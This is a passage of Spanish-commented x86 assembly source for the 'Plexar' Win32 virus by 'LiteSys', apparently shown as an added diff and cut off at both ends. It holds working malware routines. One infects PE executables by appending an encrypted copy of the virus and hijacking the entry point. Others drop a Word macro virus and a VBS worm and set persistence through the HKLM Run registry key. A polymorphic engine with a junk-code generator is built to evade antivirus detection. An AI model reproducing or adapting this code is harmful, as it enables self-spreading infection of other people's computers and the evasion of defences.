[EBX+ExitThread] + + RET + + ENDIF + + @Infecta_Este_Exe: + CALL Infecta_PE + JMP @Retorna_Directa + + Directa ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; Proceso para infectar un PE. + ; + ; EBX -> Archivo a infectar + + Infecta_PE PROC + + PUSHAD + + PUSH DWO [HostBack] + POP DWO [Guarda_EIP] + + CALL @Seh_IPE + + MOV ESP, [ESP+8h] + JMP @PEF + + @Seh_IPE: + + XOR EAX, EAX + PUSH DWORD PTR FS:[EAX] + MOV FS:[EAX], ESP + + PUSH 019d + POP ECX + + MOV ESI, EBX + LEA EDX, OFS [CRCNoInf] + + @CicloNo: + + PUSH 04h + POP EDI + PUSH EBX + PUSH ESI + PUSH EDX + PUSH ECX + CALL CRC32 + POP ECX + POP EDX + POP ESI + POP EBX + CMP EAX, DWORD PTR [EDX] + JZ @PEF + ADD EDX, 4h + LOOP @CicloNo + + PUSH 00000000h + PUSH EBX + APICALL SetFileAttributesA + + XOR EAX, EAX + PUSH EAX + PUSH 00000000h + PUSH OPEN_EXISTING + PUSH EAX + PUSH EAX + PUSH GENERIC_READ + GENERIC_WRITE + PUSH EBX + APICALL CreateFileA + MOV DWO [FHandle], EAX + INC EAX + JZ @PEF + + DEC EAX + PUSH NULL + PUSH EAX + APICALL GetFileSize + MOV DWO [Tamao_1], EAX + INC EAX + JZ @PE_Close + DEC EAX + + CMP EAX, 8192d + JB @PE_Close + + ADD EAX, Virus_Tamao + 1400h + MOV DWO [Tamao_2], EAX + + XOR EDX, EDX + PUSH EDX + PUSH EAX + PUSH EDX + PUSH PAGE_READWRITE + PUSH EDX + PUSH DWO [FHandle] + APICALL CreateFileMappingA + MOV DWO [MHandle], EAX + OR EAX, EAX + JZ @PE_Close + + XOR EDX, EDX + PUSH DWO [Tamao_2] + PUSH EDX + PUSH EDX + PUSH FILE_MAP_WRITE + PUSH EAX + APICALL MapViewOfFile + MOV DWO [BaseMap], EAX + OR EAX, EAX + JZ @PE_CloseMap + + MOV EDI, EAX + MOV BX, WORD PTR [EDI] + AND BX, 3ED4h ; "ZM" = 5A4Dh ^ 3ED4h == 1444h + ADD BX, BX + XOR BX, 3488h + JNZ @PE_UnMap + + MOV EBX, DWORD PTR [EDI+3Ch] + ADD EBX, EDI + CMP EBX, DWO [BaseMap] + JB @PE_UnMap + MOV EDX, DWO [BaseMap] + ADD EDX, DWO [Tamao_1] + CMP EBX, EDX + JA @Pe_UnMap + + ADD EDI, [EDI+3Ch] + MOV BX, WORD PTR [EDI] + OR BX, 0AEDAh ; "EP" = 4550h | 0AEDAh == 0EFDAh + SUB BX, 0EFDAh + JNZ @PE_UnMap + + MOV ESI, EDI + PUSHAD + ADD ESI, 4Ch + MOV EDI, 5h + CALL CRC32 + CMP EAX, CRC_PLXR + POPAD + JE @PE_UnMap + + MOV EAX, "rxlp" XOR 0C3E8F2A8h + XOR EAX, 0C3E8F2A8h + MOV DWORD PTR [EDI+4Ch], EAX + + ADD ESI, 18h + MOVZX EAX, WORD PTR [EDI+14h] + ADD ESI, EAX + + XOR EDX, EDX + MOVZX EDX, WORD PTR [EDI+06h] + DEC EDX + IMUL EDX, 28h + ADD ESI, EDX + + OR DWORD PTR [ESI+24h], 0A0000020h + + MOV EAX, DWORD PTR [ESI+08h] + PUSH EAX + ADD EAX, Virus_Tamao + 400h + MOV DWORD PTR [ESI+08h], EAX + + MOV EBX, DWORD PTR [EDI+3Ch] + XOR EDX, EDX + DIV EBX + INC EAX + MUL EBX + + MOV DWORD PTR [ESI+10h], EAX + + MOV EAX, DWORD PTR [ESI+10h] + ADD EAX, DWORD PTR [ESI+0Ch] + MOV DWORD PTR [EDI+50h], EAX + + POP EDX + + MOV EAX, DWORD PTR [EDI+28h] + ADD EAX, DWORD PTR [EDI+34h] + MOV DWO [HostBack], EAX + + ADD EDX, DWORD PTR [ESI+0Ch] + MOV DWORD PTR [EDI+28h], EDX + + PUSH EBP + PUSH EBX + INC ESP + + POP EBX ; \ + DEC ESP ; \ + PUSH EBX ; > "[LSX]" Cadena Ejecutable. + POP EAX ; / + POP EBP ; / + + MOV EDI, DWORD PTR [ESI+14h] + ADD EDI, DWORD PTR [ESI+08h] + ADD EDI, DWO [BaseMap] + MOV ECX, Virus_Tamao / 4 + SUB EDI, Virus_Tamao + 400h + LEA ESI, OFS [Empieza_Plexar] + CALL PXPE + + PUSH DWO [Tamao_2] + POP DWO [Tamao_1] + + @PE_UnMap: + + XOR EAX, EAX + PUSH EAX + PUSH EAX + PUSH DWO [Tamao_1] + PUSH DWO [FHandle] + APICALL SetFilePointer + + PUSH DWO [FHandle] + APICALL SetEndOfFile + + PUSH DWO [BaseMap] + APICALL UnmapViewOfFile + + @PE_CloseMap: + + PUSH DWO [MHandle] + APICALL CloseHandle + + @PE_Close: + + PUSH DWO [FHandle] + APICALL CloseHandle + + @PEF: + + XOR ECX, ECX + POP DWORD PTR FS:[ECX] + POP ECX + + PUSH DWO [Guarda_EIP] + POP DWO [HostBack] + + POPAD + RET + + Infecta_PE ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; Este proceso suelta en disco un archivo PE vacio. + ; + ; EBX -> Nombre + + Droppear_PE PROC + PUSHAD + + XOR EAX, EAX + PUSH EAX + PUSH FILE_ATTRIBUTE_NORMAL + PUSH CREATE_ALWAYS + PUSH EAX + PUSH EAX + PUSH GENERIC_READ + GENERIC_WRITE + PUSH EBX + APICALL CreateFileA + MOV DWO [FHandle_DPE], EAX + INC EAX + JZ @Fin_DPE + DEC EAX + + XOR EBX, EBX + PUSH EBX + PUSH 32768d + PUSH EBX + PUSH PAGE_READWRITE + PUSH EBX + PUSH EAX + APICALL CreateFileMappingA + MOV DWO [MHandle_DPE], EAX + OR EAX, EAX + JZ @DPE_Cierra + + XOR EBX, EBX + PUSH 32768d + PUSH EBX + PUSH EBX + PUSH FILE_MAP_WRITE + PUSH EAX + APICALL MapViewOfFile + MOV DWO [BaseMap_DPE], EAX + OR EAX, EAX + JZ @DPE_CierraMap + + PUSH EAX + LEA EAX, OFS [Dropper] + PUSH EAX + CALL _aP_depack_asm + ADD ESP, 08h + + XOR EBX, EBX + PUSH EBX + PUSH EBX + PUSH EAX + PUSH DWO [FHandle_DPE] + APICALL SetFilePointer + + @DPE_DesMapea: + + PUSH DWO [BaseMap_DPE] + APICALL UnmapViewOfFile + + @DPE_CierraMap: + + PUSH DWO [MHandle_DPE] + APICALL CloseHandle + + @DPE_Cierra: + + PUSH DWO [FHandle_DPE] + APICALL SetEndOfFile + + PUSH DWO [FHandle_DPE] + APICALL CloseHandle + + POPAD + RET + + @Fin_DPE: + + POPAD + STC + RET + + Droppear_PE ENDP + + DB 00h, 00h + DB "< Virus Plexar (c) Julio/Agosto 2001 - Escrito por LiteSys >" + DB 00h, 00h + DB "[ Hecho en Venezuela ]" + DB 00h, 00h + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; Proceso para soltar el virus macro de Word. + + Infecta_Word PROC Pascal DeltaOfs:DWORD + + PUSHAD + + MOV EBP, DeltaOfs + + CALL @SEH_3 + + MOV ESP, DWORD PTR [ESP+8h] + JMP @IW_Fin + + @SEH_3: + + XOR EAX, EAX + PUSH DWORD PTR FS:[EAX] + MOV FS:[EAX], ESP + + PUSH PAGE_READWRITE + PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN + PUSH MAX_PATH + PUSH NULL + APICALL VirtualAlloc + MOV DWO [VFreeZ], EAX + OR EAX, EAX + JZ @IW_Fin + + PUSH MAX_PATH + PUSH EAX + APICALL GetWindowsDirectoryA + OR EAX, EAX + JZ @IW_Fin + + PUSH DWO [VFreeZ] + APICALL SetCurrentDirectoryA + OR EAX, EAX + JZ @IW_Fin + + PUSH MEM_DECOMMIT + PUSH MAX_PATH + PUSH 12345678h + ORG $-4 + VFreeZ DD 00000000h + APICALL VirtualFree + + LEA EBX, OFS [WScript_Exe] + CALL @Existe_Archivo + JNC @VBS_Fin + + LEA EBX, OFS [Raxelp_$$$] + CALL @Existe_Archivo + JC @IW_Fin + + LEA EDI, OFS [Macaco] + PUSH 08h + POP ECX + @IW2: + PUSH 25d + POP EBX + CALL Random + ADD EAX, 65d + STOSB + LOOP @IW2 + + MOV EAX, "$$$." + STOSD + XOR AL, AL + STOSB + + LEA EBX, OFS [Macaco] + CALL Droppear_PE + JC @IW_Fin + + LEA EBX, OFS [Macaco] + CALL Infecta_PE + + XOR EAX, EAX + PUSH EAX + PUSH FILE_ATTRIBUTE_NORMAL + PUSH OPEN_EXISTING + PUSH EAX + PUSH EAX + PUSH GENERIC_READ + GENERIC_WRITE + LEA EAX, OFS [Macaco] + PUSH EAX + APICALL CreateFileA + MOV DWO [FHandle_IW], EAX + INC EAX + JZ @IW_Fin + DEC EAX + + PUSH NULL + PUSH EAX + APICALL GetFileSize + MOV DWO [Tamao_IW], EAX + INC EAX + JZ @IW_CierraFile + + XOR EAX, EAX + PUSH EAX + PUSH EAX + PUSH EAX + PUSH PAGE_READWRITE + PUSH EAX + PUSH DWO [FHandle_IW] + APICALL CreateFileMappingA + MOV DWO [MHandle], EAX + OR EAX, EAX + JZ @IW_CierraFile + + XOR EBX, EBX + PUSH EBX + PUSH EBX + PUSH EBX + PUSH FILE_MAP_READ + FILE_MAP_WRITE + PUSH EAX + APICALL MapViewOfFile + MOV DWO [BaseMap_IW], EAX + OR EAX, EAX + JZ @IW_CierraMap + + PUSH PAGE_READWRITE + PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN + MOV EAX, DWO [Tamao_IW] + ADD EAX, EAX + ADD EAX, 1000h + PUSH EAX + PUSH NULL + APICALL VirtualAlloc + MOV DWO [Memoria_IW], EAX + OR EAX, EAX + JZ @IW_Fin + + MOV ECX, DWO [Tamao_IW] + MOV EDI, EAX + MOV ESI, DWO [BaseMap_IW] + + @Conve: + + LODSB + CALL @Hexa + STOSW + + LOOP @Conve + + XOR EAX, EAX + STOSD + + PUSH DWO [BaseMap_IW] + APICALL UnmapViewOfFile + + PUSH DWO [MHandle_IW] + APICALL CloseHandle + + PUSH DWO [FHandle_IW] + APICALL CloseHandle + + XOR EAX, EAX + PUSH EAX + PUSH FILE_ATTRIBUTE_NORMAL + PUSH CREATE_NEW + PUSH EAX + PUSH EAX + PUSH GENERIC_READ + GENERIC_WRITE + LEA EAX, OFS [Raxelp_$$$] + PUSH EAX + APICALL CreateFileA + MOV DWO [FHandle_IW], EAX + INC EAX + JZ @IW_Fin + + DEC EAX + XOR EBX, EBX + PUSH EBX + PUSH 131072d + PUSH EBX + PUSH PAGE_READWRITE + PUSH EBX + PUSH EAX + APICALL CreateFileMappingA + MOV DWO [MHandle_IW], EAX + OR EAX, EAX + JZ @IW_CierraFile + + XOR EBX, EBX + PUSH EBX + PUSH EBX + PUSH EBX + PUSH FILE_MAP_READ + FILE_MAP_WRITE + PUSH EAX + APICALL MapViewOfFile + MOV DWO [BaseMap_IW], EAX + OR EAX, EAX + JZ @IW_CierraMap + + MOV EDI, EAX + LEA ESI, OFS [Virus_Macro] + PUSH L_Virus_Macro + POP ECX + REP MOVSB + + MOV ESI, DWO [Memoria_IW] + XOR EDX, EDX + XOR EAX, EAX + + @IW_B: + + MOVSB + INC EDX + CMP EDX, 200d + JNZ @IW_D + + MOV AL, '"' + STOSB + MOV AX, 0A0Dh + STOSW + MOV EAX, "adoj" + STOSD + MOV EAX, 'j = ' + STOSD + MOV EAX, " ado" + STOSD + MOV AX, " +" + STOSW + MOV AL, '"' + STOSB + + ; joda = joda + " + + XOR EAX, EAX + XOR EDX, EDX + + @IW_D: + + CMP BYTE PTR [ESI], AL + JNZ @IW_B + + MOV AL, '"' + STOSB + MOV AX, 0A0Dh + STOSW + + LEA ESI, OFS [Virus_Macro_2] + PUSH L_Virus_Macro_2 + POP ECX + REP MOVSB + + PUSH DWO [BaseMap_IW] + APICALL UnmapViewOfFile + + PUSH DWO [MHandle_IW] + APICALL CloseHandle + + SUB EDI, DWO [BaseMap_IW] + XOR EBX, EBX + PUSH EBX + PUSH EBX + PUSH EDI + PUSH DWO [FHandle_IW] + APICALL SetFilePointer + + PUSH DWO [FHandle_IW] + APICALL SetEndOfFile + + PUSH DWO [FHandle_IW] + APICALL CloseHandle + + PUSH MEM_DECOMMIT + MOV EAX, DWO [Tamao_IW] + ADD EAX, EAX + ADD EAX, 1000h + PUSH EAX + PUSH DWO [Memoria_IW] + APICALL VirtualFree + + XOR EAX, EAX + PUSH EAX + PUSH FILE_ATTRIBUTE_NORMAL + PUSH CREATE_ALWAYS + PUSH EAX + PUSH EAX + PUSH GENERIC_WRITE + LEA EBX, OFS [Plxwrd_vbs] + PUSH EBX + APICALL CreateFileA + MOV DWO [FHandle], EAX + INC EAX + JZ @IW_Fin + DEC EAX + + XOR EBX, EBX + PUSH EBX + LEA EDX, OFS [Scriptum] + PUSH EDX + PUSH Largo_MVBS + LEA EDX, OFS [Macro_VBS] + PUSH EDX + PUSH EAX + APICALL WriteFile + + PUSH DWO [FHandle_IW] + APICALL CloseHandle + + CALL @IW_Q + DB "SHLWAPI.DLL", 00h + @IW_Q: APICALL LoadLibraryA + OR EAX, EAX + JZ @IW_Fin + + CALL @IW_K + DB "SHSetValueA", 00h + @IW_K: PUSH EAX + APICALL GetProcAddress + OR EAX, EAX + JZ @IW_Fin + + PUSH 11d + LEA EBX, OFS [Plxwrd_vbs] + PUSH EBX + PUSH REG_SZ + CALL @IW_L + DB "Plexar", 00h + @IW_L: CALL @IW_M + DB "Software\Microsoft\Windows\CurrentVersion\Run", 00h + @IW_M: PUSH HKEY_LOCAL_MACHINE + CALL EAX + + @IW_Fin: + + XOR ECX, ECX + POP DWORD PTR FS:[ECX] + POP ECX + + IF DEBUG + + POPAD + RET + + ELSE + + MOV DWO [GuardaEBP2], EBP + POPAD + + MOV EBX, 12345678h + ORG $-4 + GuardaEBP2 DD 00000000h + + PUSH NULL + CALL [EBX+ExitThread] + + RET + + ENDIF + + @IW_CierraMap: + + PUSH DWO [MHandle_IW] + APICALL CloseHandle + + @IW_CierraFile: + + PUSH DWO [FHandle_IW] + APICALL CloseHandle + JMP @IW_Fin + + ; Convierte un numero a su representacion ASCII en Hex. + + @Hexa: + + PUSH ECX + PUSH EDI + + XOR ECX, ECX + MOV CL, AL + PUSH ECX + SHR CL, 04h + LEA EDI, OFS [Tabla_Hex] + INC CL + + @@Y: + INC EDI + DEC CL + JNZ @@Y + + DEC EDI + MOV AL, BYTE PTR [EDI] ; Pasa el numero exacto de la tabla + POP ECX + AND CL, 0Fh + LEA EDI, OFS [Tabla_Hex] + INC CL + + @@X: + INC EDI + DEC CL + JNZ @@X + + DEC EDI + MOV AH, BYTE PTR [EDI] ; Pasa el numero exacto de la tabla + POP EDI + POP ECX + + RET 00h + + Infecta_Word ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + Worm_VBS PROC Pascal DeltaOfs:DWORD + + PUSHAD + + MOV EBP, DeltaOfs + + CALL @SEH_4 + + MOV ESP, DWORD PTR [ESP+8h] + JMP @VBS_Fin + + @SEH_4: + + XOR EAX, EAX + PUSH DWORD PTR FS:[EAX] + MOV FS:[EAX], ESP + + PUSH PAGE_READWRITE + PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN + PUSH MAX_PATH + PUSH NULL + APICALL VirtualAlloc + MOV DWO [VFreeX], EAX + OR EAX, EAX + JZ @VBS_Fin + + PUSH MAX_PATH + PUSH EAX + APICALL GetWindowsDirectoryA + OR EAX, EAX + JZ @VBS_Fin + + PUSH DWO [VFreeX] + APICALL SetCurrentDirectoryA + OR EAX, EAX + JZ @VBS_Fin + + PUSH MEM_DECOMMIT + PUSH MAX_PATH + PUSH 12345678h + ORG $-4 + VFreeX DD 00000000h + APICALL VirtualFree + + LEA EBX, OFS [WScript_Exe] + CALL @Existe_Archivo + JNC @VBS_Fin + + LEA EBX, OFS [Raxelp_vbs] + CALL @Existe_Archivo + JC @VBS_Fin + + PUSH 10d + POP EBX + CALL Random + XCHG ECX, EAX + LEA EDI, OFS [Nombres_Varios] + INC ECX + @VBS1: + XOR AL, AL + SCASB + JNZ @VBS1 + LOOP @VBS1 + + PUSH EDI + @VBS2: + XOR AL, AL + INC ECX + SCASB + JNZ @VBS2 + DEC ECX + POP EDI + + MOV BY [LargoVBS], CL + MOV DWO [GuardaNom], EDI + + MOV EBX, EDI + CALL Droppear_PE + JC @VBS_Fin + + MOV EBX, DWO [GuardaNom] + CALL Infecta_PE + + XOR EAX, EAX + PUSH EAX + PUSH FILE_ATTRIBUTE_NORMAL + PUSH CREATE_NEW + PUSH EAX + PUSH EAX + PUSH GENERIC_READ + GENERIC_WRITE + LEA EAX, OFS [Raxelp_vbs] + PUSH EAX + APICALL CreateFileA + MOV DWO [FHandle_WVBS], EAX + INC EAX + JZ @VBS_Fin + DEC EAX + + XOR EBX, EBX + PUSH EBX + PUSH 4096d + PUSH EBX + PUSH PAGE_READWRITE + PUSH EBX + PUSH EAX + APICALL CreateFileMappingA + MOV DWO [MHandle_WVBS], EAX + OR EAX, EAX + JZ @VBS_CierraFile + + XOR EBX, EBX + PUSH EBX + PUSH EBX + PUSH EBX + PUSH FILE_MAP_READ + FILE_MAP_WRITE + PUSH EAX + APICALL MapViewOfFile + MOV DWO [BaseMap_WVBS], EAX + OR EAX, EAX + JZ @VBS_DesMapea + + XCHG EDI, EAX + LEA ESI, OFS [Gusano_VBS] + PUSH L_Gusano_VBS + POP ECX + REP MOVSB + + PUSH EDI + PUSH MAX_PATH + PUSH EDI + APICALL GetWindowsDirectoryA + OR EAX, EAX + JZ @VBS_CierraTodo + POP EDI + ADD EDI, EAX + MOV BYTE PTR [EDI], "\" + INC EDI + + MOV ESI, DWO [GuardaNom] + MOVZX ECX, BY [LargoVBS] + REP MOVSB + + LEA ESI, OFS [Gusano_VBS2] + PUSH L_Gusano_VBS2 + POP ECX + REP MOVSB + SUB EDI, DWO [BaseMap_WVBS] + + PUSH DWO [BaseMap_WVBS] + APICALL UnmapViewOfFile + + PUSH DWO [MHandle_WVBS] + APICALL CloseHandle + + XOR EBX, EBX + PUSH EBX + PUSH EBX + PUSH EDI + PUSH DWO [FHandle_WVBS] + APICALL SetFilePointer + + PUSH DWO [FHandle_WVBS] + APICALL SetEndOfFile + + PUSH DWO [FHandle_WVBS] + APICALL CloseHandle + + CALL @VBS3 + DB "SHELL32.DLL", 00h + @VBS3: APICALL LoadLibraryA + OR EAX, EAX + JZ @VBS_Fin + + CALL @VBS4 + DB "ShellExecuteA", 00h, 5 DUP (90h) + @VBS4: PUSH EAX + APICALL GetProcAddress + OR EAX, EAX + JZ @VBS_Fin + + XOR EBX, EBX + PUSH EBX + PUSH EBX + PUSH EBX + LEA EDX, OFS [Raxelp_VBS] + PUSH EDX + PUSH EBX + PUSH EBX + CALL EAX + + @VBS_Fin: + + XOR ECX, ECX + POP DWORD PTR FS:[ECX] + POP ECX + + IF DEBUG + + POPAD + RET + + ELSE + + MOV DWO [GuardaEBP3], EBP + POPAD + + MOV EBX, 12345678h + ORG $-4 + GuardaEBP3 DD 00000000h + + PUSH NULL + CALL [EBX+ExitThread] + RET + + ENDIF + + @VBS_CierraTodo: + + PUSH DWO [BaseMap_WVBS] + APICALL UnmapViewOfFile + + @VBS_DesMapea: + + PUSH DWO [MHandle_WVBS] + APICALL CloseHandle + + @VBS_CierraFile: + + XOR EBX, EBX + PUSH EBX + PUSH EBX + PUSH DWO [Scriptum] + PUSH DWO [FHandle_WVBS] + APICALL SetFilePointer + + PUSH DWO [FHandle_WVBS] + APICALL SetEndOfFile + + PUSH DWO [FHandle_WVBS] + APICALL CloseHandle + + JMP @VBS_Fin + + ; Rutina para revisar la existencia de un archivo. + ; EBX -> Nombre de archivo. + ; Retorna acarreo si existe + + @Existe_Archivo: + + PUSH EBX + PUSH PAGE_READWRITE + PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN + PUSH SIZEOF_WIN32_FIND_DATA + PUSH NULL + APICALL VirtualAlloc + MOV DWO [VAllocZ], EAX + OR EAX, EAX + JZ @EA_Negativo + POP EBX + + PUSH EAX + PUSH EBX + APICALL FindFirstFileA + INC EAX + JZ @EA_Negativo + + DEC EAX + PUSH EAX + APICALL FindClose + + PUSH MEM_DECOMMIT + PUSH SIZEOF_WIN32_FIND_DATA + PUSH 12345678h + ORG $-4 + VAllocZ DD 00000000h + APICALL VirtualFree + + STC + RET 0 + + @EA_Negativo: + + PUSH MEM_DECOMMIT + PUSH SIZEOF_WIN32_FIND_DATA + PUSH DWO [VAllocZ] + APICALL VirtualFree + + CLC + RET 0 + + + Worm_VBS ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + DB "[" XOR 40h + DB "D" XOR 40h + DB "e" XOR 40h + DB "s" XOR 40h + DB "i" XOR 40h + DB "g" XOR 40h + DB "n" XOR 40h + DB "e" XOR 40h + DB "d" XOR 40h + DB " " XOR 40h + DB "b" XOR 40h + DB "y" XOR 40h + DB " " XOR 40h + DB "L" XOR 40h + DB "i" XOR 40h + DB "t" XOR 40h + DB "e" XOR 40h + DB "S" XOR 40h + DB "y" XOR 40h + DB "s" XOR 40h + DB "]" XOR 40h + DB 40h + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; PXPE: Plexar Polymorphic Engine: Another Lame Poly Written By Me. + ; + ; ESI -> Origen + ; EDI -> Destino + ; ECX -> Tamao + + PXPE PROC + + MOV DWO [Origen], ESI + MOV DWO [Destino], EDI + MOV DWO [Tamao], ECX + + CALL @Inicializar_Semillas + + XOR EBX, EBX + DEC EBX + CALL @Aleatorio + MOV DWO [Llave], EAX + + MOV EDI, DWO [Destino] + + ; DELTA + + PUSH EDI + CALL @Basura + CALL @Basura + POP EDX + SUB EDX, EDI + MOV DWO [GuardaDelta2], EDX + + MOV AL, 0E8h ; CALL + STOSB + XOR EAX, EAX ; Delta + STOSD + CALL @Basura + CALL @Basura + CALL @Popear_Delta + CALL @Basura + CALL @Basura + CALL @Meter_Tamao + CALL @Basura + CALL @Basura + + CALL @Colocar_Lea + CALL @Basura + MOV DWO [GuardaLoop], EDI + CALL @Basura + + MOV AX, 03781h ; XOR DWORD PTR [EDI] + STOSW + MOV EAX, DWO [Llave] + STOSD + CALL @Basura + CALL @Basura + CALL @SumaCuatro + CALL @Basura + CALL @Basura + + MOV AL, 049h + STOSB + MOV AX, 850Fh + STOSW + MOV EAX, DWO [GuardaLoop] + SUB EAX, EDI + SUB EAX, 04h + STOSD + + CALL @Basura + CALL @Basura + + MOV EAX, EDI + SUB EAX, DWO [Destino] + SUB EAX, 05h + MOV EBX, DWO [GuardaDelta] + SUB DWORD PTR [EBX], EAX + MOV EDX, DWO [GuardaDelta2] + SUB DWORD PTR [EBX], EDX + + MOV ESI, DWO [Origen] + MOV ECX, DWO [Tamao] + MOV EAX, DWO [Llave] + + @ReCopia: + MOVSD + XOR DWORD PTR [EDI-4h], EAX + LOOP @ReCopia + + RET + + @Inicializar_Semillas: + + LEA EDI, OFS [@SaveSemilla] + RDTSC + STOSD + PUSH 04h + POP EDI + LEA ESI, OFS [@SaveSemilla] + CALL CRC32 + MOV DWO [Semilla_1], EAX + + APICALL GetTickCount + ADD EAX, EAX + NOT EAX ; que mierda... + PUSH 04h + POP EDI + LEA ESI, OFS [@SaveSemilla] + CALL CRC32 + MOV DWO [Semilla_2], EAX + + RET + + ; Un indecente generador de numeros aleatorios... + ; + ; EBX -> Limite. + + @Aleatorio: + + PUSH EDI + PUSH ECX + PUSH EDX + PUSH EBX + + MOV EAX, DWO [Semilla_1] + IMUL EAX, Mierda_1 + ADD EAX, Mierda_2 + MOV DWO [Semilla_1], EAX + + LEA EDI, OFS [Milonga] + STOSD + + MOV EBX, DWO [Semilla_2] + IMUL EBX, Mierda_3 + ADD EBX, Mierda_4 + MOV DWO [Semilla_2], EBX + XCHG EAX, EBX + STOSD + + LEA ESI, OFS [Milonga] + PUSH 08h + POP EDI + CALL CRC32 + + POP EBX + XOR EDX, EDX + DIV EBX + + XCHG EDX, EAX + + POP EDX + POP ECX + POP EDI + + RET + + Milonga DB 9 DUP (00h) + + @Popear_Delta: + + PUSH 04h + POP EBX + CALL @Aleatorio + OR EAX, EAX + JZ @Popear_Delta_I + CMP EAX, 01h + JZ @Popear_Delta_II + CMP EAX, 02h + JZ @Popear_Delta_III + CMP EAX, 03h + JZ @Popear_Delta_IV + + JMP @Popear_Delta_IV + + @Popear_Delta_R: + + RET + + @Popear_Delta_I: + MOV AL, 05Dh ; POP EBP + STOSB + MOV AX, 0ED81h ; SUB EBP + STOSW + MOV DWO [GuardaDelta], EDI + MOV EAX, DWO [Origen] + STOSD + JMP @Popear_Delta_R + + @Popear_Delta_II: + MOV AL, 058h + STOSB + MOV AL, 02Dh + STOSB + MOV DWO [GuardaDelta], EDI + MOV EAX, DWO [Origen] + STOSD + MOV AL, 095h + STOSB + JMP @Popear_Delta_R + + @Popear_Delta_III: + MOV AL, 05Bh + STOSB + MOV AL, 0BAh + STOSB + MOV DWO [GuardaDelta], EDI + MOV EAX, DWO [Origen] + STOSD + MOV AX, 0D329h + STOSW + MOV AX, 0DD87h + STOSW + JMP @Popear_Delta_R + + @Popear_Delta_IV: + MOV AL, 05Ah + STOSB + MOV AL, 068h + STOSB + MOV DWO [GuardaDelta], EDI + MOV EAX, DWO [Origen] + STOSD + MOV AL, 05Dh + STOSB + MOV AX, 0D587h + STOSW + MOV AX, 0D529h + STOSW + JMP @Popear_Delta_R + + RET + + @Meter_Tamao: + + PUSH 04h + POP EBX + CALL @Aleatorio + OR EAX, EAX + JZ @Meter_Tamao_I + CMP EAX, 01h + JZ @Meter_Tamao_II + CMP EAX, 02h + JZ @Meter_Tamao_III + CMP EAX, 03h + JZ @Meter_Tamao_IV + + JMP @Meter_Tamao_III + + @Meter_TamaoR: + + RET + + @Meter_Tamao_I: + MOV AL, 0B9h + STOSB + MOV EAX, DWO [Tamao] + STOSD + JMP @Meter_TamaoR + + @Meter_Tamao_II: + MOV AL, 068h + STOSB + MOV EAX, DWO [Tamao] + STOSD + MOV AL, 059h + STOSB + JMP @Meter_TamaoR + + @Meter_Tamao_III: + MOV AL, 0BAh + STOSB + MOV EAX, DWO [Tamao] + NOT EAX + STOSD + MOV AX, 0CA87h + STOSW + MOV AX, 0D1F7h + STOSW + JMP @Meter_TamaoR + + @Meter_Tamao_IV: + XOR EBX, EBX + DEC EBX + CALL @Aleatorio + XCHG EDX, EAX + + MOV AL, 068h + STOSB + MOV EAX, EDX + STOSD + MOV AL, 058h + STOSB + MOV AL, 035h + STOSB + MOV EAX, DWO [Tamao] + XOR EAX, EDX + STOSD + MOV AL, 091h + STOSB + JMP @Meter_TamaoR + + @Colocar_LEA: + + PUSH 03h + POP EBX + CALL @Aleatorio + OR EAX, EAX + JZ @Colocar_Lea_I + CMP EAX, 01h + JZ @Colocar_Lea_II + CMP EAX, 02h + JZ @Colocar_Lea_III + + JMP @Colocar_Lea_II + + @Colocar_LEAR: + + RET + + @Colocar_LEA_I: + MOV AX, 0BD8Dh + STOSW + MOV EAX, DWO [Origen] + STOSD + JMP @Colocar_LEAR + + @Colocar_LEA_II: + MOV AL, 0BFh + STOSB + MOV EAX, DWO [Origen] + STOSD + MOV AX, 0EF01h + STOSW + JMP @Colocar_LEAR + + @Colocar_LEA_III: + MOV AL, 068h + STOSB + MOV EAX, DWO [Origen] + STOSD + MOV AL, 05Ah + STOSB + MOV AX, 0EA01h + STOSW + MOV AX, 0D787h + STOSW + JMP @Colocar_LEAR + + @SumaCuatro: + + PUSH 04h + POP EBX + CALL @Aleatorio + OR EAX, EAX + JZ @SumaCuatro_I + CMP EAX, 01h + JZ @SumaCuatro_II + CMP EAX, 02h + JZ @SumaCuatro_III + CMP EAX, 03h + JZ @SumaCuatro_IV + + JMP @SumaCuatro_III + + @SumaCuatroR: + + RET + + @SumaCuatro_I: + MOV AX, 0C781h + STOSW + MOV EAX, 00000004h + STOSD + JMP @SumaCuatroR + + @SumaCuatro_II: + MOV EAX, 47474747h + STOSD + JMP @SumaCuatroR + + @SumaCuatro_III: + MOV AL, 47h + STOSB + MOV AX, 0C781h + STOSW + MOV EAX, 00000002h + STOSD + MOV AL, 47h + STOSB + JMP @SumaCuatroR + + @SumaCuatro_IV: + MOV AX, 0C781h + STOSW + MOV EAX, 00000003h + STOSD + MOV AL, 47h + STOSB + JMP @SumaCuatroR + + ; Generador de basura! Mega Lamer!!! + + @Basura: + + PUSH 10d + POP ECX + + @BasLoop: + + PUSH 08d + POP EBX + CALL @Aleatorio + + OR EAX, EAX + JZ @Basura_1 + CMP EAX, 1h + JZ @Basura_2 + CMP EAX, 2h + JZ @Basura_3 + CMP EAX, 3h + JZ @Basura_4 + CMP EAX, 4h + JZ @Basura_5 + CMP EAX, 5h + JZ @Basura_6 + CMP EAX, 6h + JZ @Basura_7 + + JMP @Basura_1 + + @BasuraR: + + LOOP @BasLoop + + RET + + @Basura_1: + + PUSH 07h + POP EBX + CALL @Aleatorio + LEA ESI, OFS [@B1_Tabla] 